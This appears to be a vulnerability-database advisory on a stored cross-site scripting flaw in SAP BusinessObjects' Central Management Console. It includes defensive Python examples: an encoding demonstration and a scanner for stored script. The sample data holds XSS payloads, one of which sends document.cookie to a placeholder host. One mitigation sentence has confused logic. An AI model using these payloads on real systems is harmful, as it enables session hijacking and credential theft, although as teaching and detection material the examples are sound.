CVE-2026-24325: CWE-79: Improper Neutralization of Input During Web Page Generation in SAP_SE SAP BusinessObjects Enterprise (Central Management Console)
CVE-2026-24325 is a stored Cross-Site Scripting (XSS) vulnerability in the SAP BusinessObjects Enterprise Central Management Console (CMC). It arises from improper output encoding of user-controlled input, allowing an authenticated administrator to store JavaScript that executes in the browser of any other user who later views the affected page. The vulnerability has a limited impact on confidentiality and integrity and no impact on availability. Exploitation requires high privileges (an admin account) and user interaction (a victim opening the page), which limits its ease of exploitation. No exploits are currently reported in the wild. The affected versions are ENTERPRISE 430, 2025, and 2027. The CVSS v3.1 base score is 4.8 (medium). European organizations running SAP BusinessObjects Enterprise, particularly in countries with significant SAP deployments, should apply the SAP patch when available and tighten controls around CMC administrator accounts in the meantime.
AI Analysis
Technical Summary
CVE-2026-24325 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79 in the SAP BusinessObjects Enterprise Central Management Console. The root cause is insufficient neutralization of user-supplied input during web page generation: values entered by an authenticated administrator are written back into CMC pages without context-appropriate encoding, so an administrator can embed JavaScript in the web interface. When other users open the compromised page, the script runs in their browser session, which can enable session hijacking, credential theft, or unauthorized actions performed in the victim's application context. The attacker must hold high privileges (an admin user), and the victim must interact by visiting the page. The CVSS v3.1 score is 4.8 (medium), with low impact on confidentiality and integrity and none on availability. Affected versions are ENTERPRISE 430, 2025, and 2027. No public exploits are known, but the flaw is relevant wherever several administrators or operators share the CMC, because the stored payload reaches everyone who views the page, not just its author. The defect is the classic one: output to an HTML page must be encoded for the context it lands in (element body, attribute value, URL), regardless of how trusted the author of the stored value is.
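The following is an added illustration of the CWE-79 pattern described above; it is generic example code written for this page, not SAP's CMC code, and the object-description field, payload and rendering functions are all hypothetical. It shows a stored administrator-supplied value concatenated into HTML unencoded, the same value rendered with context-aware encoding, and a small parser-based check that reports whether the rendered page picked up a script element or an event-handler attribute.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: a description an administrator might store for an
# object that other users later view. Hypothetical payload, not taken from
# the advisory.
MALICIOUS_DESCRIPTION = (
    'Quarterly report" onmouseover="alert(document.cookie)">'
    '<script>alert(1)</script>'
)


def render_vulnerable(name, description):
    """The CWE-79 defect: stored text is concatenated into HTML unencoded."""
    return (f'<tr><td title="{description}">{name}</td>'
            f'<td>{description}</td></tr>')


def render_hardened(name, description):
    """Encode each value for the context it lands in. html.escape() escapes
    <, >, & and (with quote=True, the default) both quote characters, which
    covers element bodies and quoted attribute values."""
    return (f'<tr><td title="{html.escape(description)}">{html.escape(name)}</td>'
            f'<td>{html.escape(description)}</td></tr>')


def safe_href(link):
    """A URL context needs more than HTML encoding: a javascript: scheme is
    harmless to html.escape() but still executes when clicked. Allow only
    relative paths and http(s) URLs; anything else is replaced by a no-op."""
    scheme = urlsplit(link).scheme.lower()
    if scheme not in ("", "http", "https"):
        return "#"
    return html.escape(link)


class ActiveContentFinder(HTMLParser):
    """Collects script elements and on* attributes as the browser would
    actually see them after parsing, which is more reliable than grepping
    the raw string (an encoded &quot; onmouseover= is inert)."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for attr, _value in attrs:
            if attr.startswith("on"):
                self.findings.append(f"{attr} handler on <{tag}>")


def find_active_content(rendered_html):
    parser = ActiveContentFinder()
    parser.feed(rendered_html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        page = render("Sales Q1", MALICIOUS_DESCRIPTION)
        print(f"{label}: {find_active_content(page) or 'no active content'}")
    print("javascript: link ->", safe_href("javascript:alert(1)"))
```

The vulnerable renderer yields both an `onmouseover` handler and two script elements from a single stored value; the hardened renderer yields none, and the parser-based check is what you would reuse in a regression test for any page that echoes stored admin input.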
Potential Impact
For European organizations, this vulnerability allows a malicious or compromised administrator to execute arbitrary JavaScript in the context of the SAP BusinessObjects Enterprise Central Management Console for every user who views the affected page. Although the rated impact on confidentiality and integrity is low, an attacker could read session tokens, alter interface elements, or trigger actions on behalf of other users, undermining trust in the administration console itself. Availability is not affected, so service disruption is unlikely, but a successful attack can be a stepping stone to further compromise or data leakage. Organizations that depend on SAP BusinessObjects for business intelligence and reporting face reputational and compliance exposure if sensitive report data is exposed or manipulated. The need for admin privileges and user interaction narrows the attack surface, but it does not remove the risk in environments with several privileged users, shared admin accounts, or weak internal controls, because the flaw is effectively admin-to-admin.
Mitigation Recommendations
1. Apply the SAP patch or security note for the affected versions (ENTERPRISE 430, 2025, 2027) as soon as it is available; the root-cause fix, context-aware output encoding in the CMC pages, can only be made in SAP's code.
2. Until patched, treat every administrator-editable field that the CMC renders to other users as a potential injection point, and avoid viewing CMC pages from a browser session that also carries other sensitive logins.
3. Limit the number of users with CMC administrative privileges and enforce least privilege, since the attacker in this scenario is an administrator or someone who has taken over an administrator account.
4. Train administrators to recognize unexpected markup or script in shared CMC content and to report it rather than dismiss it; training does not stop a malicious insider, so it complements rather than replaces the controls below.
5. Monitor CMC audit logs and user activity for object names, descriptions, or other stored fields containing HTML tags, event-handler attributes, or javascript: URLs, and for such changes made by accounts that do not normally edit them.
6. Consider a Content Security Policy that restricts inline script, but test it carefully: a CSP added at a reverse proxy in front of a vendor web application can break legitimate CMC functionality, so validate in a non-production tier first.
7. Require multi-factor authentication for admin accounts; this reduces the likelihood that a stolen credential becomes the "high-privilege" attacker, though it does not address an insider who already holds the account.
8. Regularly review and audit configurations and customizations in SAP BusinessObjects to find stored values that already contain script, since a payload planted before patching remains in place after the fix is applied only if the fix changes rendering rather than the stored data.
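An added example for the monitoring and audit items above (it is not from SAP or this advisory): a small scanner that takes exported CMC object metadata and flags stored values that carry script-like content. The export format, record fields and sample values are all constructed for the example; in practice you would feed it whatever your CMS repository or audit export produces. It decodes HTML entities and strips whitespace before matching so that entity-encoded tags and split `javascript:` schemes are not missed.

```python
import html
import re

# Constructed sample export: object id, owning account, and the two
# free-text fields most likely to be rendered back to other users.
SAMPLE_RECORDS = [
    {"id": "1001", "owner": "Administrator", "name": "Sales Q1",
     "description": "Monthly sales summary"},
    {"id": "1002", "owner": "bi_admin2", "name": "Finance",
     "description": "<img src=x onerror=\"fetch('//x.invalid/'+document.cookie)\">"},
    {"id": "1003", "owner": "bi_admin2",
     "name": "Ops &lt;script&gt;alert(1)&lt;/script&gt;", "description": "ok"},
    {"id": "1004", "owner": "Administrator", "name": "Links",
     "description": "See jav&#x09;ascript:alert(1)"},
    {"id": "1005", "owner": "Administrator", "name": "Ops <b>bold</b>",
     "description": "harmless markup"},
]

SCANNED_FIELDS = ("name", "description")

# Indicators checked against the decoded, lower-cased value. Order matters
# only for the order of findings.
TAG_INDICATORS = [
    ("script element", re.compile(r"<script\b")),
    ("event handler attribute", re.compile(r"<\w+[^>]*\bon[a-z]+\s*=")),
    ("embedded frame or object", re.compile(r"<(iframe|object|embed|svg)\b")),
]


def normalize(value):
    """Decode entities and fold case so &lt;script&gt; and <SCRIPT> look alike."""
    return html.unescape(value).lower()


def has_javascript_url(decoded):
    """Browsers tolerate tabs/newlines inside the scheme, so strip all
    whitespace and control characters before looking for javascript:."""
    compact = re.sub(r"[\s\x00]+", "", decoded)
    return "javascript:" in compact


def scan_value(value):
    decoded = normalize(value)
    hits = [name for name, pattern in TAG_INDICATORS if pattern.search(decoded)]
    if has_javascript_url(decoded):
        hits.append("javascript: URL")
    return hits


def scan_records(records):
    """Return (id, field, indicator) for every suspicious stored value."""
    findings = []
    for rec in records:
        for field in SCANNED_FIELDS:
            for indicator in scan_value(rec.get(field, "")):
                findings.append((rec["id"], field, indicator))
    return findings


def findings_by_owner(records):
    """Group flagged objects by owning account; a single account owning all
    hits is the pattern to escalate."""
    flagged = {f[0] for f in scan_records(records)}
    owners = {}
    for rec in records:
        if rec["id"] in flagged:
            owners.setdefault(rec["owner"], []).append(rec["id"])
    return owners


if __name__ == "__main__":
    for finding in scan_records(SAMPLE_RECORDS):
        print("%s %-12s %s" % finding)
    print(findings_by_owner(SAMPLE_RECORDS))
```

Plain formatting tags such as `<b>` are deliberately not flagged, so the scanner reports the three planted payloads and not the harmless record; tune `TAG_INDICATORS` to your own tolerance for false positives.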
Affected Countries
Germany, France, United Kingdom, Netherlands, Switzerland, Sweden, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: sap
- Date Reserved: 2026-01-21T22:15:36.673Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 698aaa0c4b57a58fa1c64d68
Added to database: 2/10/2026, 3:46:20 AM
Last enriched: 2/17/2026, 9:41:55 AM
Last updated: 2/21/2026, 12:19:26 AM